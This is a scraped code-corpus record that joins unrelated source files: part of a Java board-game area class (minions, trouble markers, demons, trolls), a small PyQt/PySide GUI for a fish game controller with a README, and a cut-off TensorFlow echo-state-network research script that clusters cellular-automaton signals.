for(int i=0;i<this.minions.size();i++)
{
info2=info2+ this.minions.get(i).toString()+", ";
}
info2=info2+"\n\n";
return info+info2;
}
/**
* Add a minion to area; if the area already contains one or more minions add a trouble marker.
* @param minion
*/
public void addMinion(Piece minion,boolean loading)
{
//Only add trouble markers if the game was not loaded.
if(loading == false)
if(this.getMinions().size()>=1 || this.getDemon()>=1 || this.getTroll()>=1)//There is already at least one minion in the area or at least one demon or at least one troll.
this.troubleMarker=true;//add a trouble marker.
this.minions.add(minion);
}
//TODO: Check if we can remove the trouble marker from here as well.
/**
* Add a minion to area. Returns true if successful otherwise it returns false.
* @param minion
* @return boolean
*/
public Piece removeMinion(Colors color)
{
//this.minions.remove(minion);
for(int i=0;i<minions.size();i++)
{
if(minions.get(i).getColor() == color)
return this.minions.remove(i);
}
return null;
}
/**
* Add troubleMarker to area if possible(Only one trouble marker is allowed per area). Return true if successful else return false.
* @return boolean
*/
public boolean addTroubleMarker(){
if(this.troubleMarker==false ){
//There's no trouble marker on this area.
this.troubleMarker=true;
return true;
}else{
//A trouble marker already exists on this area.
return false;
}
}
/**
* remove troubleMarker to area if possible(Only one trouble marker is allowed per area). Return true if successful else return false.
* @return boolean
*/
public boolean removeTroubleMarker()
{
if(this.troubleMarker==true )//There's a trouble marker on this area.
{
this.troubleMarker=false;
return true;
}else
{//A trouble marker already exists on this area.
return false;
}
}
/**
* Add Building to area if possible(Only one Bulding is allowed per area). Also set the color of the building.
* @return boolean
*/
public boolean addBuilding(Player player)
{
if(this.building==false)//There's no trouble marker on this area.
{
this.building=true;
this.buildingColor=player.getColor();
return true;
}else
{//A trouble marker already exists on this area.
return false;
}
}
/**
* Add Building to area if possible(Only one Building is allowed per area).Also remove color from building.
* Return true if successful else return false.
* @return boolean
*/
public boolean removeBuilding()
{
if(this.building==true)//There's no trouble marker on this area.
{
this.building=false;
this.buildingColor=Colors.NONE;
return true;
}else
{//A trouble marker already exists on this area.
return false;
}
}
/**
* Add or remove demon to area. If the argument is 1 then it will add a demon else if it is 2 it will remove a demon if possible.
* Will return a boolean depending on weather the action was successful.further it will add a trouble marker even if there are no minions or trolls
* in the area.
* @param addRemove
* @return boolean
*/
public boolean addRemoveDemon(int addRemove)
{
if(addRemove==1)//add demon
{
this.demon++;
boolean check=this.addTroubleMarker();
if(check)
System.out.println("Added a trouble marker.");
this.getCityCard().setIsActive(false);//Make city card not active
return true;
}else if (addRemove==2)//remove demon if possible
{
if(this.demon >0)
{
this.demon--;
if(this.getDemon()==0)//If there are no more demons on the area. Set the city card to active.
this.getCityCard().setIsActive(true);
return true;
}else
return false;
}
return false;
}
/**
* Add or remove troll to area. If the argument is 1 then it will add a troll else if it is 2 it will remove a troll if possible.
* Will return a boolean depending on weather the action was successful. further it will add a trouble marker if there's already a
* minion,demon or another troll in the area.
* @param addRemove
* @return boolean
*/
public boolean addRemoveTroll(int addRemove){
if( addRemove == 1 ){
//add troll
this.troll++;
//Add trouble marker of applicable.
if(this.demon>0 || this.minions.size()>0 || this.troll>0)
{
boolean check=this.addTroubleMarker();
if(check)
System.out.println("Added a trouble marker.");
}
return true;
//remove troll if possible
}else if ( addRemove == 2 ){
if( this.troll > 0 ){
this.troll--;
return true;
}else{
return false;
}
}
return false;
}
}
| c441ebee3f5ed31122ba5c7115c87cd61ae3520d | [
"Java"
] | 11 | Java | murindwaz/TM23 | b7e0a5bc023cf8b02780eb32611bf963a3e346ec | 90756cbb0ce8cb19d57391de407e8fa6f3cd4ef0 |
refs/heads/master | <file_sep>from PyQt5 import uic
from PyQt5.QtWidgets import QApplication, QMessageBox
from PyQt5 import uic
import sys
def run():
print("program run")
global A
A = ui.time1.text()
def save():
global A
A = 'B'
app = QApplication([])
ui = uic.loadUi('UI/fish_controller.ui')
ui.run.clicked.connect(run)
ui.save.clicked.connect(save)
ui.show()
app.exec_()
print(A)<file_sep># Fish_Game_Control
Real-time fish game controller
<file_sep>from PySide2.QtWidgets import QApplication, QMainWindow, QPushButton, QPlainTextEdit,QMessageBox
from PySide2.QtUiTools import QUiLoader
from PySide2.QtCore import QFile
class Stats():
def __init__(self):
self.ui = QUiLoader().load('UI/fish_controller.ui')
self.ui.run.clicked.connect(self.run_game)
self.ui.save.clicked.connect(self.save)
def run_game(self):
print("程序开始")
def save(self):
time1 = self.ui.time1.text()
if time1 =="":
QMessageBox.about(self.ui,"提示","请输入触发时间")
key1 = self.ui.key1.text()
if key1 =="":
QMessageBox.about(self.ui,"提示","请输入触发时间")
time2 = self.ui.time2.text()
key2 = self.ui.key2.text()
ipAddr = self.ui.ipAddr.text()
port = self.ui.ipAddr.text()
print(type(time1),key1,time2,key2,ipAddr,port)
app = QApplication([])
stats = Stats()
stats.ui.show()
app.exec_() | eabbe19dcafda2837f59882a2dd2b97c5acf92a4 | [
"Markdown",
"Python"
] | 3 | Python | ArtistVan1/Fish_Game_Control | 6975e213d2a0bef4f04b89501951f01d6e51fc56 | 4c44d527f3298ab5d4f1356314fb9ab16568c5a1 |
refs/heads/master | <file_sep>package com.example.demochat.service;
import com.example.demochat.domain.Message;
import java.util.List;
public interface MessageService {
public Message addMessage(Message message);
public List<Message> getMessagesByChannelId(Long channelId);
}
<file_sep>package com.example.demochat.service.impl;
import com.example.demochat.domain.ChannelUser;
import com.example.demochat.repository.ChannelUserRepository;
import com.example.demochat.service.ChannelUserService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import java.util.List;
@Service
public class ChannelUserServiceImpl implements ChannelUserService {
@Autowired
ChannelUserRepository channelUserRepository;
@Override
public void addChannelUser(ChannelUser channelUser) {
channelUserRepository.save(channelUser);
}
@Override
public ChannelUser getChannelUser(Long channelId, Long userId) {
return channelUserRepository.findChannelUserByChannelIdAndUserId(channelId, userId);
}
@Override
public List<ChannelUser> getChannelUsersByUserId(Long userId) {
return channelUserRepository.findAllByUserId(userId);
}
}
<file_sep>insert into user (id, email, password, nickname, regdate) VALUES (1, 'test', '{bcrypt}$2a$10$qS48/8nM2fSagy1di.whF.tutE/VZ9/wwOkGBcm.Ty8mOKLfwpv/G', '아이스베어', now());
insert into user (id, email, password, nickname, regdate) VALUES (2, 'test2', '{bcrypt}$2a$10$qS48/8nM2fSagy1di.whF.tutE/VZ9/wwOkGBcm.Ty8mOKLfwpv/G', '갈색곰', now());
insert into user (id, email, password, nickname, regdate) VALUES (3, 'test3', '{bcrypt}$2a$10$qS48/8nM2fSagy1di.whF.tutE/VZ9/wwOkGBcm.Ty8mOKLfwpv/G', '판다', now());
insert into user_roles(id, role_name, user_id) VALUES (1, 'USER', 1);
insert into user_roles(id, role_name, user_id) VALUES (2, 'ADMIN', 1);
insert into user_roles(id, role_name, user_id) VALUES (3, 'USER', 2);
insert into user_roles(id, role_name, user_id) VALUES (4, 'ADMIN', 2);
insert into user_roles(id, role_name, user_id) VALUES (5, 'USER', 3);
insert into channel (id, name, regdate) VALUES (1, 'room number 1', now());
insert into channel (id, name, regdate) VALUES (2, 'room number 2', now());
insert into channel (id, name, regdate) VALUES (3, 'room number 3', now());
insert into channel (id, name, regdate) VALUES (4, 'room number 4', now());
insert into channel_user (id, user_id, channel_id) VALUES (1, 1, 1);
insert into channel_user (id, user_id, channel_id) VALUES (2, 1, 2);
insert into channel_user (id, user_id, channel_id) VALUES (3, 1, 3);
insert into channel_user (id, user_id, channel_id) VALUES (4, 1, 4);
insert into channel_user (id, user_id, channel_id) VALUES (5, 2, 1);
insert into channel_user (id, user_id, channel_id) VALUES (6, 2, 2);
insert into channel_user (id, user_id, channel_id) VALUES (7, 3, 3);
insert into channel_user (id, user_id, channel_id) VALUES (8, 3, 4);<file_sep>package com.example.demochat.service;
import com.example.demochat.domain.User;
public interface UserService {
public void addUser(User user);
public User getUserByEmail(String email);
}
<file_sep>package com.example.demochat.config;
import com.example.demochat.interceptor.HttpSessionIdHandshakeInterceptor;
import com.example.demochat.websocket.RawWebSocketHandler;
import com.example.demochat.websocket.CustomWebSocketHandler;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.socket.config.annotation.*;
@Configuration
@EnableWebSocket
public class WebSocketConfig implements WebSocketConfigurer {
@Autowired
private CustomWebSocketHandler customWebSocketHandler;
@Override
public void registerWebSocketHandlers(WebSocketHandlerRegistry registry) {
registry.addHandler(new RawWebSocketHandler(), "/raw");
registry.addHandler(customWebSocketHandler, "/sock").withSockJS().setInterceptors(new HttpSessionIdHandshakeInterceptor());
}
}
<file_sep>package com.example.demochat.repository;
import com.example.demochat.domain.ChannelUser;
import org.springframework.data.jpa.repository.JpaRepository;
import org.springframework.data.jpa.repository.Query;
import org.springframework.data.repository.query.Param;
import java.util.List;
public interface ChannelUserRepository extends JpaRepository<ChannelUser, Long> {
ChannelUser findChannelUserByChannelIdAndUserId(Long channelId, Long userId);
@Query("select c from ChannelUser c where c.user.id = :userId")
List<ChannelUser> findAllByUserId(@Param("userId") Long userId);
}
<file_sep>package com.example.demochat.service.impl;
import com.example.demochat.domain.Message;
import com.example.demochat.repository.MessageRepository;
import com.example.demochat.service.MessageService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import java.util.List;
@Service
public class MessageServiceImpl implements MessageService {
@Autowired
MessageRepository messageRepository;
@Override
public Message addMessage(Message message) {
return messageRepository.save(message);
}
@Override
public List<Message> getMessagesByChannelId(Long channelId) {
return messageRepository.findAllByChannelId(channelId);
}
}
<file_sep>var sock = null;
$(document).ready(function () {
sock = new SockJS('/sock');
sock.onopen = function () {
console.log("connected");
};
sock.onmessage = function (e) {
var data = JSON.parse(e.data);
var channelId = data.channelId;
if($("#"+channelId).css('display') != 'none'){
showMessage(data);
}
};
sock.onclose = function () {
console.log('disconnected');
};
$("#chatInput_1").keypress(function(e) {
if (e.keyCode == 13){
sendMsg(1);
}
});
$("#chatInput_2").keypress(function(e) {
if (e.keyCode == 13){
sendMsg(2);
}
});
$("#chatInput_3").keypress(function(e) {
if (e.keyCode == 13){
sendMsg(3);
}
});
$("#chatInput_4").keypress(function(e) {
if (e.keyCode == 13){
sendMsg(4);
}
});
});
function enter(channelId) {
// if(!$("#"+channelId).css('display') == 'none'){
$.ajax({
url: '/api/channels/'+channelId,
method: 'get',
dataType: "json",
contentType: "application/json",
success: function (data) {
if(data != null){
for(var i=0;i<data.length;i++){
showMessage(data[i]);
}
}
}
});
// $("#"+channelId).show();
// }
}
function sendMsg(channelId) {
sock.send(JSON.stringify({'channelId' : channelId, 'text' : $("#chatInput_"+channelId).val()}));
/*var JSONObject= {
"channelId" : channelId,
"text" : $("#chatInput_"+channelId).val()
};
var jsonData = JSON.stringify( JSONObject );
$.ajax({
url: '/api/channels/'+channelId+'/messages',
method: 'post',
data: jsonData,
dataType: "json",
contentType: "application/json",
success: function (data) {
// showMessage(data);
}
});*/
$("#chatInput_"+channelId).val("");
}
function disconnect() {
sock.close();
}
function showMessage(data) {
$('#messages_'+data.channelId).append("[" + data.nickname + "] " + data.text + '\n');
var textArea = $('#messages_'+data.channelId);
textArea.scrollTop( textArea[0].scrollHeight - textArea.height() );
}
function getFormData($form){
var unindexed_array = $form.serializeArray();
var indexed_array = {};
$.map(unindexed_array, function(n, i){
indexed_array[n['name']] = n['value'];
});
return indexed_array;
}
function createChannel() {
var $form = $("#creatForm");
var data = getFormData($form)
var jsonData = JSON.stringify(data);
$.ajax({
url: '/api/channels',
method: 'post',
data: jsonData,
dataType: "json",
contentType: "application/json",
success: function (data) {
freshChannelList(data);
$('.pop-layer').hide();
$('#name').val("");
$('#purpose').val("");
$('#invite').val("");
}
});
}
function freshChannelList(data) {
$("#channelList").empty();
alert("mmmm");
for(var key in data){
// var $div = $('<div></div>').appendTo($("#channelList"));
// $('<a></a>').attr('onclick', 'enter(1)').attr('value', data[key].name)
// .addClass('btn btn-light btn-block').appendTo($div);
// $('<a></a>').attr('onclick', 'enter(1)').attr('value', data[key].name)
// .appendTo($div);
$("#channelList").innerHTML = data[key].name;
}
} | b39d78d08b8a0de336c6045b2e9ed849f684794d | [
"JavaScript",
"Java",
"SQL"
] | 8 | Java | SehwaKim/demochat | 3c4c90dc647b76876d46c6432a9738b157fd5adb | 0905fc14fed2bff03918655a93672ce38223836b |
refs/heads/master | <file_sep>package dubbo
type ServiceStub struct {
ClientStubName string
ServiceName string
ServerStubName string
SeverStubMethods string
UnimplementedServerName string
ClientMethods []string
ServerMethods []string
UnimplementedStubMethods []string
ServerProxyMethods []string
}
<file_sep>#### 简介
- 只是一款protocol buffer编译的插件,作用类似protobuf的grpc插件,用于生成dubbogo的go stub
#### 准备
- 首先要有protoc编译工具, 具体安装方法google一下就可以了
```shell script
go get -u github.com/skyitachi/protoc-gen-dubbogo
```
#### 使用指南
```shell script
cd example
# 如果protoc-gen-dubbgo在PATH里面的话
protoc --dubbogo_out=plugins=dubbogo:. user/user.proto
# 指定plugins path
protoc --plugin={plugin_path} --dubbogo_out=plugins=dubbogo:. user/user.proto
```
ps: 除了plugin的名称不一样以外,其他使用方式和grpc的plugin是一样的<file_sep>package dubbo
import (
"bytes"
"fmt"
pb "github.com/golang/protobuf/protoc-gen-go/descriptor"
"github.com/golang/protobuf/protoc-gen-go/generator"
"log"
"text/template"
)
const (
contextPkgPath = "context"
dubbogoPkgPath = "github.com/apache/dubbo-go"
errorPkgPath = "github.com/pkg/errors"
configPkgPath = "github.com/apache/dubbo-go/config"
)
var (
contextPkg string
)
var reservedClientName = map[string]bool{
// TODO: do we need any in gRPC?
}
type dubbogo struct {
gen *generator.Generator
}
func init() {
//fmt.Println("in the dubbogo plugin inited")
//var cc *grpc.ClientConn
//cc.Invoke()
generator.RegisterPlugin(new(dubbogo))
}
func (d *dubbogo) P(args ...interface{}) { d.gen.P(args...) }
func (d dubbogo) Name() string {
return "dubbogo"
}
func (d *dubbogo) Init(g *generator.Generator) {
d.gen = g
}
// Also record that we're using it, to guarantee the associated import.
func (d *dubbogo) objectNamed(name string) generator.Object {
d.gen.RecordTypeUse(name)
return d.gen.ObjectNamed(name)
}
// Given a type name defined in a .proto, return its name as we will print it.
func (d *dubbogo) typeName(str string) string {
return d.gen.TypeName(d.objectNamed(str))
}
func (d *dubbogo) GenerateImports(file *generator.FileDescriptor) {
//fmt.Println("not implement")
}
func (d *dubbogo) Generate(file *generator.FileDescriptor) {
if len(file.FileDescriptorProto.Service) == 0 {
return
}
contextPkg = string(d.gen.AddImport(contextPkgPath))
d.gen.AddImport(errorPkgPath)
d.gen.AddImport(configPkgPath)
d.P("// Reference imports to suppress errors if they are not otherwise used.")
d.P("var _ ", contextPkg, ".Context")
d.P()
// Assert version compatibility.
d.P("// This is a compile-time assertion to ensure that this generated file")
d.P("// is compatible with the grpc package it is being compiled against.")
d.P()
for i, service := range file.FileDescriptorProto.Service {
//d.generateService(file, service, i)
d.generateService(file, service, i)
}
}
var deprecationComment = "// Deprecated: Do not use."
func (d *dubbogo) generateService(file *generator.FileDescriptor, service *pb.ServiceDescriptorProto, index int) {
tplStr := GetServiceTpl()
tpl, err := template.New(service.GetName()).Parse(tplStr)
if err != nil {
log.Fatal(err)
}
serviceStub := ServiceStub{
ServiceName: service.GetName(),
ClientStubName: service.GetName(),
ServerStubName: service.GetName() + "Server",
UnimplementedServerName: "Unimplemented" + service.GetName() + "Server",
}
buffer := bytes.NewBuffer([]byte{})
origServName := service.GetName()
fullServName := origServName
if pkg := file.GetPackage(); pkg != "" {
fullServName = pkg + "." + fullServName
}
servName := generator.CamelCase(origServName)
//deprecated := service.GetOptions().GetDeprecated()
clientMethods := make([]string, 0)
serverMethods := make([]string, 0)
serverStubMethods := make([]string, 0)
unimplementedStubMethods := make([]string, 0)
stubName := serviceStub.ServerStubName + "Stub"
for _, method := range service.Method {
client, server := d.generateClientSignature(servName, method)
unimplemented := d.generateUnimplementedServerService(server, serviceStub.UnimplementedServerName)
clientMethods = append(clientMethods, client)
serverMethods = append(serverMethods, server)
unimplementedStubMethods = append(unimplementedStubMethods, unimplemented)
methodName := method.GetName()
returnType := d.typeName(method.GetOutputType())
reqType := d.typeName(method.GetInputType())
stubMethod := d.generateServerStubMethod(stubName, methodName, contextPkg, returnType, reqType)
serverStubMethods = append(serverStubMethods, stubMethod)
}
serverMethods = append(serverMethods, "Reference() string")
serviceStub.ClientMethods = clientMethods
serviceStub.ServerMethods = serverMethods
serviceStub.UnimplementedStubMethods = unimplementedStubMethods
serviceStub.ServerProxyMethods = serverStubMethods
if err := tpl.Execute(buffer, serviceStub); err != nil {
log.Fatal(err)
}
d.P(string(buffer.Bytes()))
}
func (d *dubbogo) generateClientSignature(servName string, method *pb.MethodDescriptorProto) (string, string) {
origMethName := method.GetName()
methName := generator.CamelCase(origMethName)
if reservedClientName[methName] {
methName += "_"
}
reqArg := ", in *" + d.typeName(method.GetInputType())
if method.GetClientStreaming() {
reqArg = ""
}
respName := "out *" + d.typeName(method.GetOutputType())
serverRespName := " *" + d.typeName(method.GetOutputType())
if method.GetServerStreaming() || method.GetClientStreaming() {
respName = servName + "_" + generator.CamelCase(origMethName) + "Client"
}
client := fmt.Sprintf("%s func (ctx %s.Context%s, %s) error", methName, contextPkg, reqArg, respName)
server := fmt.Sprintf("%s(ctx %s.Context%s) (%s, error)", methName, contextPkg, reqArg, serverRespName)
return client , server
}
func (d *dubbogo) generateUnimplementedServerService(methodSignature string, stubName string) string {
return fmt.Sprintf("func (*%s) %s{\nreturn nil, errors.New(\"not implemented\")\n}", stubName, methodSignature)
}
func (d *dubbogo) generateServerStubMethod(stubName string, methodName string, ctxPkg string, returnType string, req string) string {
tpl := GetStubMethodTpl()
return fmt.Sprintf(tpl, stubName, methodName, ctxPkg, returnType, req, methodName)
}
<file_sep>package dubbo
func GetServiceTpl() string {
return `
type {{.ClientStubName}} struct {
{{range .ClientMethods}}
{{println .}}
{{end}}
}
func ({{.ClientStubName}}) Reference() string {
return "{{.ServiceName}}"
}
func New{{.ClientStubName}}() *{{.ClientStubName}} {
client := new({{.ClientStubName}})
config.SetConsumerService(client)
return client
}
type {{.ServerStubName}} interface {
{{range .ServerMethods}}
{{println .}}
{{end}}
}
type Unimplemented{{.ServerStubName}} struct {
}
{{range .UnimplementedStubMethods }}
{{println .}}
{{end}}
func (*Unimplemented{{.ServerStubName}}) Reference() string {
return "{{.ServiceName}}"
}
type {{.ServerStubName}}Stub struct {
stub {{.ServerStubName}}
}
{{range .ServerProxyMethods}}
{{println .}}
{{end}}
func (*{{.ServerStubName}}Stub) Reference() string {
return "{{.ServiceName}}"
}
func new{{.ServerStubName}}Stub(service {{.ServerStubName}}) (*{{.ServerStubName}}Stub) {
return &{{.ServerStubName}}Stub{stub: service}
}
func RegisterProvider(service {{.ServerStubName}}) {
stub := new{{.ServerStubName}}Stub(service)
config.SetProviderService(stub)
}
`
}
func GetStubMethodTpl() string {
return `func (s *%s) %s(ctx %s.Context, data []byte) (*%s, error) {
req := &%s{}
buf := proto.Buffer{}
buf.SetBuf(data)
if err := buf.Unmarshal(req); err != nil {
return nil, err
}
return s.stub.%s(ctx, req)
}`
} | 4adb6c258f9f4123c1ef74281fa7b7f7d67e5601 | [
"Markdown",
"Go"
] | 4 | Go | skyitachi/protoc-gen-dubbogo | da99749a4de3ebb84229a328e84481cc9c8fac1f | 87a5427887bd8cbe539615a89c63f986789edaf8 |
refs/heads/master | <file_sep>#!/bin/sh
#
# ~/.xinitrc
#
# Executed by startx (run your window manager from here)
# exec gnome-session
# exec startkde
# exec startxfce4
# ...or the Window Manager of your choice
setxkbmap no
#tint2 &
# exec wmii
#exec openbox-session
#exec dbus-launch --exit-with-session ck-launch-session openbox-session
#
xsetroot -cursor_name left_ptr
feh --bg-center ~/Pictures/Wallpapers/crows-1280x960.jpg &
urxvtd -q -f -o &
exec dbus-launch --exit-with-session ck-launch-session xmonad
| 6eed844a750b3e5e3093c342299f174f2ae70324 | [
"Shell"
] | 1 | Shell | abstrakct/old-dotfiles | 209dc6348df67e874b45da78a9b9d5b3268c3ef0 | a2963453020c6027d5161d995133f4a0d2a966a3 |
refs/heads/master | <repo_name>ninedraft/selfcare<file_sep>/pkg/tasks/utils.go
package tasks
import (
"math/rand"
"time"
)
var rnd *rand.Rand
func init() {
rnd = newRnd()
}
func newRnd() *rand.Rand {
var seed = time.Now().UnixNano()
var source = rand.NewSource(seed)
return rand.New(source)
}
func DefaultLabels() []string {
return []string{
"💚", "❤", "♥", "🧡", "💜", "💛", "💙", "💗",
"💖", "✨", "✔", "🥇", "🍫", "🧁",
"🍬", "🌼", "🌻", "🌞", "☀",
}
}
<file_sep>/pkg/tasks/tasks.go
package tasks
import (
"bufio"
"encoding/json"
"fmt"
"io"
"math/rand"
"strings"
)
type Tasks struct {
rnd *rand.Rand
tasks []Task
}
func NewTasks() *Tasks {
return &Tasks{
rnd: newRnd(),
tasks: []Task{},
}
}
func ParseTasks(re io.Reader) (*Tasks, error) {
var taskSet = make(map[string][]string)
var scanner = bufio.NewScanner(re)
for scanner.Scan() {
var line = scanner.Text()
var tokens = strings.SplitN(line, ":", 2)
switch len(tokens) {
case 1:
var taskText = strings.TrimSpace(tokens[0])
taskSet[taskText] = DefaultLabels()
case 2:
var label = strings.TrimSpace(tokens[0])
var taskText = strings.TrimSpace(tokens[1])
taskSet[taskText] = append(taskSet[taskText], label)
default:
continue
}
}
if scanner.Err() != nil {
return nil, scanner.Err()
}
var taskList = make([]Task, 0, len(taskSet))
for text, labels := range taskSet {
taskList = append(taskList, Task{
Text: text,
Labels: labels,
})
}
var tasks = NewTasks()
tasks.tasks = taskList
return tasks, nil
}
func (tasks *Tasks) String() string {
return fmt.Sprintf("Tasks{%d self care tasks}", len(tasks.tasks))
}
func (tasks *Tasks) NTasks() int {
return len(tasks.tasks)
}
func (tasks *Tasks) TaskList() []Task {
var list = make([]Task, 0, tasks.NTasks())
for _, task := range tasks.tasks {
list = append(list, task.Clone())
}
return list
}
func (tasks *Tasks) PeekN(n int) []Task {
var nTasks = len(tasks.tasks)
if n < 0 || n > nTasks {
n = nTasks
}
var sample = make([]Task, 0, nTasks)
for _, i := range tasks.rnd.Perm(nTasks)[:n] {
sample = append(sample, tasks.tasks[i])
}
return sample
}
func (tasks *Tasks) PeekNasStrings(n int) []string {
var sample = make([]string, 0, len(tasks.tasks))
for _, task := range tasks.PeekN(n) {
sample = append(sample, task.AsString(tasks.rnd))
}
return sample
}
var (
_ json.Marshaler = new(Tasks)
_ json.Unmarshaler = new(Tasks)
)
func (tasks *Tasks) MarshalJSON() ([]byte, error) {
return json.Marshal(tasks.tasks)
}
func (tasks *Tasks) UnmarshalJSON(data []byte) error {
var taskList []Task
if err := json.Unmarshal(data, &taskList); err != nil {
return err
}
tasks.tasks = taskList
if tasks.rnd == nil {
tasks.rnd = newRnd()
}
return nil
}
<file_sep>/go.mod
module github.com/ninedraft/selfcare
go 1.12
<file_sep>/pkg/tasks/task.go
package tasks
import (
"fmt"
"math/rand"
)
type Task struct {
Labels []string `json:"labels"`
Text string `json:"text"`
}
func (task Task) String() string {
return task.AsString(rnd)
}
func (task Task) AsString(rnd *rand.Rand) string {
var labels = task.Labels
if len(labels) == 0 {
labels = DefaultLabels()
}
var label = labels[rnd.Intn(len(labels))]
return fmt.Sprintf("%s: %s", label, task.Text)
}
func (task Task) Clone() Task {
return Task{
Labels: append([]string{}, task.Labels...),
Text: task.Text,
}
}
| 7e4f6e5c13ac1d47e16175154fb667509c37e2d8 | [
"Go Module",
"Go"
] | 4 | Go | ninedraft/selfcare | 0cff493c58f67f8cf820e6d00cd04aa7c54414c4 | 477aed704947e504c6a7ba9221c1039b4c70d6d7 |
refs/heads/master | <repo_name>JeanCarloMacan/TFM<file_sep>/Main_Pruebas.py
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib as mpl
from TensorflowEchoStateNetwork.esn_ip_cell import ESNIPCell
import os
import pandas as pd
from functions import *
from sklearn.cluster import KMeans
from sklearn.metrics import silhouette_samples, silhouette_score
#from sklearn.cluster import DBSCAN
#from sklearn import metrics
# Algunos Hyperparametros
#units = 10
washout_size = 0
scale = 1
#connectivity = 0.3
N = 3 # Number of labels / classes
time_steps=100
max_length = 60000
initial_crop = 2000
#maxSamples = int(((max_length - initial_crop)/2)/time_steps) #Se divide para 2 xq se toman mitad y mitad para train y para test
maxSamples = 250
increment=10
channels = 1 # Numero de canales o sensores o mediciones de la serie de tiempo y que se encuentra en el .csv (# de columnas)
maxTrainingSamples = maxSamples # numero maximo de muestras (porciones de senal) que se usaran para la optimizacion de IP
# Parametros IP
mean=0.
#std=0.6
learning_rate=0.001
tag = np.reshape([np.zeros(maxSamples), np.ones(maxSamples), np.full(maxSamples,2)], -1) # Tag each point with a corresponding label. HACER ESTO DINAMICO!!!! QUE CREZCA EN FUNCION DE LOS DATOS
# Parametros para el analisis de silueta
range_n_clusters = [3, 4, 5, 6, 7]
# 0,40,96,235,249,255,57,76,77,132,187,205,26,41,94,133,154,166,
# Carga de datos, Adecuacion de los datos de train (Optimizacion IP) y prueba (para el reservorio)
#rules=[96, 77, 83, 133, 124, 86]
rules=[23,33,51,83,123,178,
124,54,147,110,137,193,18,22,86,105,122,150] # numero de reglas a utilizar, 6 de cada clase
filename='rule_'
filepath='/home/jean/Dropbox/JeanCarlo_GIDTEC y Varios_Respaldos_Personal/TFM/Datos CA/'
savePath='/home/jean/Dropbox/JeanCarlo_GIDTEC y Varios_Respaldos_Personal/TFM/Experiments/'
cluster = []
testData = []
trainIPdata=[]
for rule in rules:
df = pd.read_csv(filepath + filename + str(rule) + '_plots_single.csv', header=None, skiprows=20, nrows=max_length)
values = df.values # Sacamos del dataframe
signals = np.float32(values[initial_crop:max_length, 1:channels+1]) # Siempre se le suma +1 a los canales para tomar los datos. initial_crop es la cantidad de ticks iniciales que se cortan
trainSamples=get_more_overlaped_samples(signals,time_steps,increment,maxTrainingSamples) # Devuelve la muestra de (maxSamples,time_steps,channels)
trainIPdata.extend(trainSamples.reshape(maxSamples*time_steps,channels)) # Aplanamos en una sola serie larga la muestra actual (maxSamples*time_steps,channels), es como si pusieramos las porciones anteriores una a continuacion de otra (esto para todas las clases para IP)
testSamples = split_in_subsamples(signals,time_steps,maxSamples)
testData.append(testSamples)
cluster.append(np.transpose(np.float32(signals)))
testData = np.array(testData).reshape([len(rules)*maxSamples,time_steps,channels])/257 # Devuelve arreglo de shape (maxSamples*#reglas,time_steps,channels) y "Normalizado" a 257. Si por ejemplo maxSamples=40 y tenemos 3 reglas, la primera dimension (del batch size) seria 120. Se puede poner -1 tambien en la primera dimension
trainIPdata = np.array(trainIPdata)/257 # Normalizamos los datos que se van a usar en la optimizacion IP
print('Datos_cargados')
#plt.plot(trainIPdata)
#plt.ylabel('some numbers')
#plt.show()
# Grid Search para el tamano del Reservorio
#unidades=np.arange(2,102,2) # De 2 en 2 hasta llegar a 100
unidades = [6]
desviaciones = [1.0]
conexiones = [1.0]
for units in unidades:
for std in desviaciones:
for connectivity in conexiones:
evolutionSR_NoIP = []
evolutionSR_WithIP = []
noIP_2clusters_count = []
noIP_3clusters_count = []
noIP_4clusters_count = []
noIP_5clusters_count = []
noIP_6clusters_count = []
noIP_7clusters_count = []
noIP_8clusters_count = []
withIP_2clusters_count = []
withIP_3clusters_count = []
withIP_4clusters_count = []
withIP_5clusters_count = []
withIP_6clusters_count = []
withIP_7clusters_count = []
withIP_8clusters_count = []
Silouethe_scores_means_IP=[]
Silouethe_scores_means_noIP=[]
noIP_samples_4clusters_count = []
noIP_samples_6clusters_count = []
withIP_samples_4clusters_count = []
withIP_samples_6clusters_count = []
for z in range(10): # Numero de repeticiones
print('Estamos con '+ str(units)+' unidades')
print('Ronda: ' + str(z))
experimentName = str(units) + '_' + str(std) + '_'+str(connectivity)
tf.reset_default_graph() # Para limpiar todo el grafo en cada iteracion
with tf.Session() as S:
# Ejecucion sin optimizar IP
print("Building graph...")
# Instancia clase ESN
data_t = tf.constant(testData, dtype=tf.float32) # testData son nuestros datos a utilizar. Debe ir aqui!!, no antes
esn = ESNIPCell(units, scale, connectivity, mean=mean, std=std, learning_rate=learning_rate, input_size=trainIPdata.shape[1])
outputs, final_state = tf.nn.dynamic_rnn(esn, data_t, dtype=tf.float32)
washed = tf.squeeze(tf.slice(outputs, [0, washout_size, 0], [-1, -1, -1]))
S.run(tf.global_variables_initializer())
print("Computing embeddings...")
res = S.run(washed)
var= [v for v in tf.global_variables() if v.name == 'rnn/ESNIPCell/GainVector:0'] # Ver el contenido de las variables
print(S.run(var))
# Histogramas para ver la estructura de los datos (las distribuciones)
if units>=10:
aux=10 # Lo dejamos clavado en 10 para unicamente ver las distribuciones de las 10 primeras neuronas. Esto para resevorios con mas de 10 unidades
if units<10:
aux=units
f, a = plt.subplots(aux, 1,figsize=(12, 22))
plt.subplots_adjust(bottom=.08, top=.92, left=.1, right=.95, hspace=0.8, wspace=0.35)
a = a.ravel()
for idx, ax in enumerate(a):
ax.hist(res[:,-1,idx],200,range=(-1, 1))
ax.set_title('Neurona del Reservorio: '+str(idx))
#ax.set_xlabel('Intervalo [-1,1]')
#ax.set_ylabel('Y')
#plt.tight_layout()
#f.suptitle('Distribuciones sin Plasticidad Intrínseca', fontsize=30) # Creo q es mejor poner en el titulo de la imagen en el latex
#plt.show()
if not os.path.exists(savePath+experimentName):
os.makedirs(savePath+experimentName)
f.savefig(savePath+experimentName+'/fig_No_IP'+'_round_'+str(z)+'.pdf')
plt.close('all')
noIP_Silhouette_BestScores = []
noIP_bestScores_clusters = []
noIP_pairs = []
noIP_3clusters_scores = []
noIP_Silhouette_score=[]
noIP_samples_count = []
noIP_4clusters_samples_count= []
noIP_6clusters_samples_count = []
